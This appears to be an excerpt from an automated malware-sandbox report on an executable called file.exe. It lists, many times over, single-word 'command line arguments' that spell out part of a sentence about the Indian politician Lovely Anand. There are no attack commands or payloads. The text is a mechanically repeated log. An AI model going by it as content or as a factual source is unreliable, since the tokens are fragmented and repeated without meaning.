Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
